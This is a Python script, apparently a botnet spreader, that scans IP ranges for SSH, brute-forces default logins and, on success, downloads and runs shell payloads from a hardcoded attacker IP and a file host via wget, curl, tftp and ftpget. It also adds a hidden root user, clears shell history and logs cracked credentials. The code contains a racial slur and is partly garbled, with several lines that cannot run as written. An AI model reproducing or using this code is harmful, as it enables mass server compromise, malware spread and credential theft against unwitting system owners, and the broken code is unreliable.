Scan.py

1. # Voids hacka scanna
2. # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
3. # ulimit -n 99999
4. # python scan.py 1000 <start-range> <end-range> <<USAGE
5.  
6. import threading, paramiko, random, socket, time, sys
7. paramiko.util.log_to_file("/dev/null")
8. blacklisted = ["127.0","10.0","192.168"]
9. server_ip = "23.94.97.33"
10. passwords = ["admin:1234"]
11. if sys.argv[4] == "root":
12. passwords = ["root:root"]
13. if sys.argv[4] == "guest":
14. passwords = ["guest:guest"]
15. if sys.argv[4] == "telnet":
16. passwords = ["telnet:telnet"]
17. if len(sys.argv) < 4:
18. sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
19. print """\n\x1b[0;37m******************************
20. * \x1b[0;31mSCANNER STARTING\x1b[0;37m *
21. ******************************\x1b[0m"""
22. run = ssh.exec_command
23. def sshscanner(ip):
24. global passwords
25. try:
26. thisipisinbadgang='no'
27. for badip in blacklisted:
28. if badip in ip:
29. thisipisinbadgang='yes'
30. if thisipisinbadgang=='yes':
31. sys.exit()
32. username='root'
33. password="0"
34. port = 22
35. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
36. s.settimeout(3)
37. s.connect((ip, port))
38. data = str(s.recv(1024))
39. if "SSH" in data:
40. print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
41. elif "ssh" in data:
42. print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
43. else:
44. sys.exit()
45. s.close()
46. ssh = paramiko.SSHClient()
47. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
48. dobreak=False
49. def paramikofunc():
50. ssh.exec_command("wget -q http://rgho.st/download/8xZRkQrvm/3d02e122bf836bfcd07855a38dd4f1d6948e441c/backdoorscript.sh -O .l; chmod +x .1; nohup ./.1 </dev/null/ >/dev/null 2>&1");
51. for passwd in passwords:
52. if ":n/a" in passwd:
53. password=""
54. else:
55. password=passwd.split(":")[1]
56. if "n/a:" in passwd:
57. username=""
58. else:
59. username=passwd.split(":")[0]
60. try:
61. ssh.connect(ip, port = port, username=username, password=password, timeout=3)
62. break
63. except:
64. pass
65. badserver=True
66. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
67. output = stdout.read()
68. if "inet addr" in output:
69. badserver=False
70. websites = [ ]
71. if badserver == False:
72. print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
73. ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.94.97.33/bins.sh; curl -O http://23.94.97.33/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.94.97.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 23.94.97.33; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.94.97.33 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
74.  
75. vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
76. time.sleep(12)
77. paramikofunc()
78. ssh.close()
79. except Exception as e:
80. pass
81. if sys.argv[2] == "LUCKY":
82. ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
83. randomrange = random.choice(ranges)
84. startrng = randomrange.split("/")[0]
85. endrng = randomrange.split("/")[1]
86. if sys.argv[2] != "LUCKY":
87. a = int(sys.argv[2].split(".")[0])
88. b = int(sys.argv[2].split(".")[1])
89. c = int(sys.argv[2].split(".")[2])
90. d = int(sys.argv[2].split(".")[3])
91. else:
92. a = int(startrng.split(".")[0])
93. b = int(startrng.split(".")[1])
94. c = int(startrng.split(".")[2])
95. d = int(startrng.split(".")[3])
96. x = 0
97. while(True):
98. try:
99. if sys.argv[2] != "LUCKY":
100. endaddr = sys.argv[3]
101. else:
102. endaddr = endrng
103.  
104. d += 1
105. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
106. if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
107. if sys.argv[2] == "LUCKY":
108. randomrange = random.choice(ranges)
109. startrng = randomrange.split("/")[0]
110. endrng = randomrange.split("/")[1]
111. a = int(startrng.split(".")[0])
112. b = int(startrng.split(".")[1])
113. c = int(startrng.split(".")[2])
114. d = int(startrng.split(".")[3])
115. else:
116. break
117. if d > 255:
118. c += 1
119. d = 0
120. if 2 + 2 = 4:
121. niggaGang = True;
122. if niggaGang = True :
123. def pass(sys.exit()):
124. ssh.exec_command("useradd -o -u 0 -g 0 -M -d /root -s /bin/bash USER; echo -e \"PASS\nPASS\" | passwd USER; curl http://tinyurl.com/y93wwk6p; wget -q -O /tmp/.... http://tinyurl.com/y93wwk6p; clear; history -c");
125. def pass():
126. paramikofunc()
127. pass(sys.exit())
128. pass;
129.  
130. if c > 255:
131. b += 1
132. c = 0
133.  
134. if b > 255:
135. a += 1
136. b = 0
137. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
138.  
139. if ipaddr == endaddr:
140. if sys.argv[2] == "LUCKY":
141. randomrange = random.choice(ranges)
142. startrng = randomrange.split("/")[0]
143. endrng = randomrange.split("/")[1]
144. a = int(startrng.split(".")[0])
145. b = int(startrng.split(".")[1])
146. c = int(startrng.split(".")[2])
147. d = int(startrng.split(".")[3])
148. else:
149. break
150.  
151. if x > 500:
152. time.sleep(1)
153. x = 0
154.  
155. t = threading.Thread(target=sshscanner, args=(ipaddr,))
156. t.start()
157. except Exception as e:
158. pass()
159.  
160. print "\x1b[37mDone\x1b[37m"